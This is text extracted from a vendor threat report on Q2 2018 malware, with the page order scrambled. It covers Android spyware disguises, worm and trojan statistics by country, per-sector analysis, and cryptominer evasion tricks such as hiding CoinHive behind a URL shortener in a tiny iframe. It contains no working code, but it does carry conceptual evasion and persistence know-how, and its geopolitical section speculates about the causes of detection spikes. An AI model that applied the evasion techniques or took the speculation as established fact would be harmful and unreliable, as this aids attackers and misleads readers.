417 FakeSpy FakeSpy also has many masks that you can see in the screenshot
佐川急便 현대캐피탈
Disguises of FakeSpy
It collects available information from the infected device and sends to CampC servers Also it checks for the next banking applications aucomapp softbankcomapp docomocomapp
Here are some commands from its Command and Control server
contacts - Get contact details and email id
Mute - Set action to mute
Mms - Get MMS content
info - Get device information
Global Threat Report Q2 2018 Edition
Page 34 of 73
418 RedAlert RedAlert changes multiple ldquospy legendsrdquo to get users trust It wears masks of popular application to deceive its victims Update Flash Player Viber WhatsApp Update WhatsApp Ebook Reader
Version 1 EbookReader Update Flash Player Android Update WhatsApp Viber
Version_2 Update Google Market Flash Player Tactic FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums Its distinguishing feature is the ability to block incoming calls from banks It canvasses the device in search of the following bank applications
depostbankfinanzassistent
plmbank
aibibankandroid
The second version can block access to some websites including Google Chrome Google Play store Gmail and YouTube
419 Hero Rat The next digital spook Hero Rat mostly acts on the Iran territory It uses third-party play stores social networks and messengers for spreading
Version 1
CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره
Proxy دوست یاب Telegram Ton
Global Threat Report Q2 2018 Edition
Page 35 of 73
شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان
Disguises of Hero Rat
Its code is available on the Telegram hacking channel Noticeably that itrsquos sold in three options bronze silver and gold
After infiltration into a victimrsquos device Hero Rat shows a warning like app canrsquot be runrdquo But it runs in the background and starts the spying activity It steals text messages audio records makes calls detect device location etc The newly infected device is controlled via Telegram bot functionality
Hero Rat disguises as Bitcoin Free Internet Connection Get free Followers and Telegram versions for Iranian market
4110 Sonvpay The next malware Sonvpay also wears many masks but it is more of a fraudster than a spy
Version 1
Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot
Reccoder-Call QRCodeBar Scanner APK
Let me love you ringtone Iphone Ringtone Night light
Beauty camera-Photo editor Shape of you ringtone
Disguises of Sonvpay
Global Threat Report Q2 2018 Edition
Page 36 of 73
Sonvpay covertly subscribes the infected devices to WAP and SMS services to add extra charges to the ownerrsquos mobile billing Once installed this malware displays fake notification ldquoskip optionrdquo If you click this button this malware begins to work in the background subscribing the user to services she did not order
It comes to victims in a variety of disguises named below
4111 CoinHive And the last one in our Q2 Android malware list is CoinHive We already mentioned it earlier in the report and here is the version for Android devices CoinHive for Android comes in three versions every of them updates its mining potential It is disseminated via counterfeit apps you see below But one of the vectors is especially interesting
Version-1 Netflix Hack Instagram Hack
Version-2 TSF Launcher
Version-3 Android Service PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via hellip another cryptominer named CoinMiner
How is it possible Letrsquos imagine a cybercriminal who wants to infect its victims with a cryptominer to utilize their recourses for cryptocurrency mining She chooses CoinMiner for that purpose downloads it and implants into the victimsrsquo machines However she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive So the first attacker is a victim Thief robbing thief
This story clearly illustrates the situation in cybersecurity in Q2 No one can feel totally secure Even a predator can turn prey in seconds
Global Threat Report Q2 2018 Edition
Page 37 of 73
42 Android Malware Catalogued by Month Below you will find detailed statistics on Android-targeted malware by months
421 April 2018
Android-targeted malware on April
422 May 2018
Android targeted malware on May
020000400006000080000
100000120000140000160000180000
050000
100000150000200000250000300000350000400000450000500000
Global Threat Report Q2 2018 Edition
Page 38 of 73
423 June 2018
Android-targeted malware on June
0
50000
100000
150000
200000
250000
300000
Global Threat Report Q2 2018 Edition
Page 39 of 73
5 Malware in Q2 2018 The Big Picture
Above is a visualization of malware activity that Comodo detected in Q2 2018 The graphic covers over 400 million unique malware detections in 237 countriesrsquo top-level domains (ccTLD) This report tries to disentangle this web of malicious activity and understand each malware type individually as well as its impact around the world
Global Threat Report Q2 2018 Edition
Page 40 of 73
51 Strategic Threat Computer Worms A computer worm is like a virus but typically travels autonomously exploiting vulnerabilities in network defenses as it spreads across the Internet A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network However even worms without a payload can consume enormous bandwidth diminish network or local system resources and possibly cause a denial-of-service For this Q2 2018 Report we place Worms in a special category called ldquoStrategic Threatrdquo due to their ability to travel very quickly across the Internet and compromise many computers at once
Global Threat Report Q2 2018 Edition
Page 41 of 73
511 Generic Worms This section shows the worldrsquos most common computer worm detections covering generic worm-like activity that is not tied to a specific propagation vector
Brontok which has been plaguing our planet for over a decade ranked as the top computer Worm followed by Conficker Nimda and over 300 more
The bubble chart shows that in Q2 2018 Russia (ru) Turkey (tr) and India (in) were the countries with the highest number of Worm infections
And finally this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May) with Russian worm detections spread more evenly throughout Q2 2018
Global Threat Report Q2 2018 Edition
Page 42 of 73
512 Net Worms A ldquoNet Wormrdquo typically infects network shares (such as a remote hard drive or server) from which it can infect every computer that accesses it from a local area network (LAN) or company intranet
In Q2 2018 Allaple was the most common Net Worm detected which Microsoft describes as a ldquomulti-threaded polymorphicrdquo worm that can perform denial-of-service (DoS) attacks against websites
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2
The timeline above shows that Poland Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2 and that French detections were spread more evenly throughout the quarter
Global Threat Report Q2 2018 Edition
Page 43 of 73
513 Email Worms Email worms are nasty in that they can travel between victim computers for example via computer exploits and autorun functionality
This quarter the most common Email Worm by far was Runonce
The top four countries for Email Worm detection were Russia (ru) Germany (de) South Africa (za) and Brazil (br)
This timeline shows the primary Email Worm outbreaks during Q2 2018 with Russia experiencing rather frequent Email Worm challenges Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2
Global Threat Report Q2 2018 Edition
Page 44 of 73
514 p2p Worms A peer-to-peer (p2p) network consists of interconnected nodes (or ldquopeersrdquo) that share resources without the use of a centralized administrative system Such networks are commonly employed to share files such as unauthorized copies of books and films and hackers take advantage of this dynamic to disseminate malware
Polip was the most common p2p Worm in Q2 2018 Microsoft describes Polip as a ldquomemory residentrdquo virus that infects ldquoexerdquo and ldquoscrrdquo file and may leverage the Gnutella p2p network protocol to distribute copies of itself
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many
Global Threat Report Q2 2018 Edition
Page 45 of 73
515 IM Worms Did you know that social media accounts can be used to spread malware One special type of computer worm known as an ldquoIMrdquo or instant messaging worm can be used to send malicious links via sites such as Facebook either manually or automatically
During Q2 2018 most of the IM Worms that Comodo detected were in Iran as illustrated in the bubble chart below
This particular IM Worm was a variant of a famous IM Worm called Yahos which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm
This timeline shows that while Comodo did not detect many IM Worms they were nonetheless detected throughout Q2 2018 in various corners of the globe mostly in developing countries
Global Threat Report Q2 2018 Edition
Page 46 of 73
52 High Threat Malware
In this section we cover four high-threat malware types Backdoors Viruses Trojans and Exploits In contrast to Worms these malware types can be considered a more localized threat as they typically require some level of user interaction for propagation and installation However once they are installed on a system or network they can be devastating to personal or enterprise security
Global Threat Report Q2 2018 Edition
Page 47 of 73
521 Backdoors A backdoor is a hidden way to bypass normal user authentication often leveraged to gain covert remote access to a computer system cryptosystem or algorithm A backdoor can be an installed program or a modification to an existing legitimate program
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet) a remote access trojan (RAT) that is fully 10 years old This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose including various kinds of cyber espionage
The United Kingdom (ldquogbrdquo for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2
The UKrsquos Backdoor challenges are also apparent in this timeline Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018
Global Threat Report Q2 2018 Edition
Page 48 of 73
522 Viruses A computer virus is self-replicating code that ldquoinfectsrdquo other computer programs and devices by corrupting them in malicious ways that can facilitate data theft spam dissemination data destruction and more A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as by opening an attachment or clicking on a hyperlink
Ramnit was the top Virus for Q2 2018 Microsoft describes Ramnit as a ldquosevererdquo virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses but also that many other countries were affected especially developing countries
This timeline shows that Ukraine experienced two significant Virus spikes in mid-April and mid-May
Global Threat Report Q2 2018 Edition
Page 49 of 73
523 Trojans Trojans take their name from the famous wooden horse of Greek mythology due to malicious functionality that is hidden within seemingly useful or benign computer programs Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack including the installation and execution of ransomware
In Q2 2018 Starter was the most common trojan infecting systems in well over 100 countries Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a ldquoRemote Service Accountrdquo
The bubble chart shows that Germany (de) was the 1 country for Trojans according to Comodo detections
And this timeline shows when this huge Trojan infestation took place in the beginning of June 2018
Global Threat Report Q2 2018 Edition
Page 50 of 73
524 Exploits Computer Exploits comprise software data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware Exploits can enable unauthorized access privilege escalation or denial-of-service (DoS)
The discovery of computer exploits can be rare as such vulnerabilities are typically patched and fixed quickly once they are discovered
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges
Global Threat Report Q2 2018 Edition
Page 51 of 73
53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers
Global Threat Report Q2 2018 Edition
Page 52 of 73
531 Constructor Constructors are applications that can be used to automatically create malware files
For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users
In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
Global Threat Report Q2 2018 Edition
Page 53 of 73
532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack
MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 17 of 73
Comodo analysts revealed that the malware was a cryptominer that utilized legitimate Windows processes PowerShell to execute commands Task Scheduler to ensure persistence and Registry to hold the malicious binary code In the screenshots below you see how exactly the malware dubbed BadShell works
If we decode the PowerShell arguments we see the malicious code in the registry The code is injected into an existing running process by the PowerShell script
BadShell at work
Global Threat Report Q2 2018 Edition
Page 18 of 73
The malicious code in the registry
Global Threat Report Q2 2018 Edition
Page 19 of 73
This emergency clearly demonstrates how dangerous cryptominer activity can be Just imagine it the entire compute capacity of the enterprises computers was engaged in mining cryptocurrency depriving employees of the ability to perform their jobs Comodo analysts took over the situation and cleaned the infection from all involved computers but of course the financial losses of the company were irreversible
Invulnerability to an antivirus and persistence in the system are the most important attributes for a cryptominer because the more it runs within the infected system the more it profits the attackers That is why cybercriminals give special attention to the cryptominers ability to elude antivirus software
Below is another cunning technique that turns an infected machine into a slave of the attacker
32 WinstarNssmMiner a system killer Like other cryptominers The WinstarNssmMiner is purposed to steal computer resources to mine cryptocurrency coins for cybercriminals But it has a special feature ndash it can root into a system so deeply that it becomes unremovable Attempting to kill it will kill the target system totally
The secret of WinstarNssmMinerrsquos persistence lies in its method of infecting a victimrsquos computer It consists of two processes injected into two system svchostexe processes The first performs the main task ndash mining cryptocurrency The other runs in the background looking for antivirus products and disables them
The malicious code disguised as svhostexe
Especially impressive is that both infected svchostexe processed possess the system attribute ldquoCriticalProcess meaning that terminating any of them will crash the system leaving the user with a blue screen
WinstarNssmMiner spreading around the world
Global Threat Report Q2 2018 Edition
Page 20 of 73
WinstarNssmMiner spreading around the world
Cryptominers can kill not only victimsrsquo system but their cryptomining competitors
33 CoinMiner kills rivals CoinMiner stands out against other cryptominers with a kill list feature that checks the infected machine for the presence of other cryptomalware If an ldquoalienrdquo cryptominer is detected the feature will terminate its processes
CoinMiner kills its rivals as follows
The code below downloads CoinMiner for Windows architecture (x86 or x64) and then checks if a miner is already running by testing the presence of an ldquoAMDDriver64rdquo process
Global Threat Report Q2 2018 Edition
Page 21 of 73
The code downloads CoinMiner and checks if a miner is already running
The malware maintains two lists named $malwares and $malwares2 with the names of the processes that it is instructed to kill The lists include other types of cryptominers
In this way CoinMiner undividedly occupies the victims computer to use its resources for mining cryptocurrency
Global Threat Report Q2 2018 Edition
Page 22 of 73
Some cryptominers earned the spotlight of the mass-media and cybersecurity researchers easing user detection In Q2 these cryptominers learned to hide CoinHive is the brightest example of them
34 CoinHive changes its skin CoinHive is a popular JavaScript cryptominer If you put its string of code into your website page every visitor to the site will mine coins for you
As you can see the CoinHive script is easily detected
The CoinHive script
After many publications on this subject in the mass media and cybersecurity reports users have started checking websites codes for cryptominers But in the second quarter perpetrators found a way to overcome this obstacle Now they use a sneaky trick to camouflage the CoinHive presence with URL shorteners
Global Threat Report Q2 2018 Edition
Page 23 of 73
As a result the malicious code on a webpage looks like this
The obfuscated malicious code on a webpage
If we decode the string we encounter an iframe
The iframe loads the URL shortener
The iframe loads the URL shortener Notice the width and height of the iframe are set to 1 to make the iframe as invisible as possible
Now letrsquos see at the URL httpscnhvco
And there we can find the familiar link to CoinHive
The link to CoinHive
Global Threat Report Q2 2018 Edition
Page 24 of 73
What is the impact of this trick In a simple scenario a user visits a CoinHive-infected website Noticing notices that her computerrsquos CPU is overloaded she decides to check the webpage code but doesnrsquot find any signs of a cryptominer So she concludes that something went wrong with her PC while CoinHive coopts her computer to mine cryptocoins
The next malware in the raw prefers not mining cryptocurrency but steal it on-the-fly
35 Cryptocurrency clipboard hijacker intercepts transfers It would be more accurate to call this program cryptothief rather than cryptominer Because it does not devour an infected machinersquos resources but instead actually steals cryptocurrency redirecting it to the perpetrator
Cryptocurrency transfers require a wallet address The address is a long string combined with different characters and numbers so it is almost impossible to remember it or fill in manually That is why users usually copy-paste a wallet address to make a transaction Cybercriminals regard this copy-paste process a breach they can use to their advantage
Cryptocurrency clipboard hijacker checks the clipboard for a wallet address copy Upon finding one it changes it for the address of the wallet under the attackers control So an unaware owner of the infected machine delivers cryptocoins straight into cybercriminalsrsquo hands
New Cryptocurrency Clipboard Hijacker sample can monitor 2343286 addresses
